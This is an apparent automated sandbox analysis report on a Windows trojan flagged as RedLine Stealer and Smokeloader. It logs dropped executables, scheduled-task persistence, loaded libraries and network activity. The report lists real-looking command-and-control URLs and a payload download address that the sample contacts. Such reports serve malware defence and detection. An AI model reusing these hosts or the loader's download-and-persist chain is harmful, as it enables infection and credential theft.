                Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002BD2000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2879731701.0000000002BED000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2879731701.0000000002C27000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2879731701.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2880475527.0000000005820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.209.162.226/hb9IvshS03/index.php
                Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002BED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.209.162.226/hb9IvshS03/index.phpm
                Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.23.103.42/hb9IvshS02/index.php
                Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.23.103.42/hb9IvshS02/index.phpj8
                Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
                Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fellzobr.com/
                Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002BD2000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000021.00000002.2879731701.0000000002BED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fellzobr.com/am/random.exe
                Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002BD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fellzobr.com/am/random.exem-urlencodedB
                Source: Hkbsse.exe, 00000021.00000002.2879731701.0000000002BED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fellzobr.com/am/random.exen
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49732 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 00000000.00000002.2275523481.000000000295F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000017.00000002.2275264775.0000000002891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000021.00000002.2879671000.0000000002B63000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000021.00000002.2880062670.0000000004510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041CCA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,0_2_0041CCA7
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0041CCA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,23_2_0041CCA7
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0041CCA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,33_2_0041CCA7
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\Hkbsse.jobJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004099D00_2_004099D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A9D90_2_0040A9D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004470E90_2_004470E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004432480_2_00443248
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004262A20_2_004262A2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004217120_2_00421712
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044783B0_2_0044783B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044795B0_2_0044795B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004489000_2_00448900
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404B900_2_00404B90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404D900_2_00404D90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00442DB00_2_00442DB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00437F630_2_00437F63
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00423F010_2_00423F01
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00420F230_2_00420F23
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044E65090_2_044E6509
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_045030170_2_04503017
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044E41680_2_044E4168
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044F81CA0_2_044F81CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044E118A0_2_044E118A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_045073500_2_04507350
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044C4DF70_2_044C4DF7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044C4FF70_2_044C4FF7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_044E19790_2_044E1979
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04507AA20_2_04507AA2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04508B670_2_04508B67
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04507BC20_2_04507BC2
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_004099D023_2_004099D0
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_004470E923_2_004470E9
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0044324823_2_00443248
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_004262A223_2_004262A2
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0042171223_2_00421712
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0044783B23_2_0044783B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0044795B23_2_0044795B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_0044890023_2_00448900
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_00404B9023_2_00404B90
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_00404D9023_2_00404D90
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_00442DB023_2_00442DB0
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_00437F6323_2_00437F63
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_00423F0123_2_00423F01
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_00420F2323_2_00420F23
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044A650923_2_044A6509
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044C301723_2_044C3017
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044A416823_2_044A4168
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044B81CA23_2_044B81CA
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044A118A23_2_044A118A
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044C735023_2_044C7350
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_04484DF723_2_04484DF7
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_04484FF723_2_04484FF7
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044A197923_2_044A1979
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044C7AA223_2_044C7AA2
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044C8B6723_2_044C8B67
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 23_2_044C7BC223_2_044C7BC2
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0040E4E033_2_0040E4E0
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_004262A233_2_004262A2
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0044890033_2_00448900
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_00404B9033_2_00404B90
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_00404D9033_2_00404D90
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_00442DB033_2_00442DB0
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_00420F2333_2_00420F23
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_004470E933_2_004470E9
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0044324833_2_00443248
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0042171233_2_00421712
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0044783B33_2_0044783B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0044795B33_2_0044795B
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_00437F6333_2_00437F63
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_00423F0133_2_00423F01
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0453650933_2_04536509
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0455301733_2_04553017
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0453416833_2_04534168
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_045481CA33_2_045481CA
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0453118A33_2_0453118A
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0455735033_2_04557350
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_04514DF733_2_04514DF7
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_04514FF733_2_04514FF7
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_0453197933_2_04531979
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_04557AA233_2_04557AA2
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_04558B6733_2_04558B67
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: 33_2_04557BC233_2_04557BC2
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 044DE2F7 appears 38 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0041E090 appears 43 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00418110 appears 129 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 044DDCB9 appears 68 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0041DA52 appears 76 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 044D8377 appears 133 times
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: String function: 0041E090 appears 89 times
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: String function: 00418110 appears 258 times
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: String function: 0452DCB9 appears 68 times
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: String function: 04528377 appears 133 times
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: String function: 0041D773 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: String function: 0041D75E appears 61 times
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: String function: 04498377 appears 133 times
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: String function: 0452D9C5 appears 50 times
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: String function: 0449DCB9 appears 68 times
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: String function: 0041DA52 appears 163 times
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: String function: 0452E2F7 appears 38 times
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: String function: 0041C1F9 appears 32 times
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: String function: 00417A50 appears 38 times
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: String function: 00438EB3 appears 43 times
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeCode function: String function: 0449E2F7 appears 38 times
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 728
                Source: file.exe, 00000000.00000002.2275577797.0000000002A1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesOtlasik0 vs file.exe
                Source: file.exe, 00000000.00000000.2115109806.000000000284E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesOtlasik0 vs file.exe
                Source: file.exe, 00000000.00000003.2210480732.00000000065EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesOtlasik0 vs file.exe
                Source: file.exeBinary or memory string: OriginalFilenamesOtlasik0 vs file.exe
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000000.00000002.2275523481.000000000295F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000017.00000002.2275264775.0000000002891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000021.00000002.2879671000.0000000002B63000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000021.00000002.2880062670.0000000004510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Hkbsse.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: random[1].exe.33.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 9f93a2.33.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/66@1/4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0296036E CreateToolhelp32Snapshot,Module32First,0_2_0296036E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A9D9 SetCurrentDirectoryA,GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,0_2_0040A9D9
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeMutant created: \Sessions\1\BaseNamedObjects\5ebdeb3f981e7577724a336321b324eb
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1924
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3916
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6912
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\3bca58ceceJump to behavior
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 728
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 780
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 856
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 864
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 912
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 912
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1040
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1048
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1204
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1212
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 476
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 536
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 556
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 532
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeProcess created: unknown unknown
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: msimg32.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: msvcr100.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: msimg32.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: msvcr100.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exeSection loaded: iertutil.dll
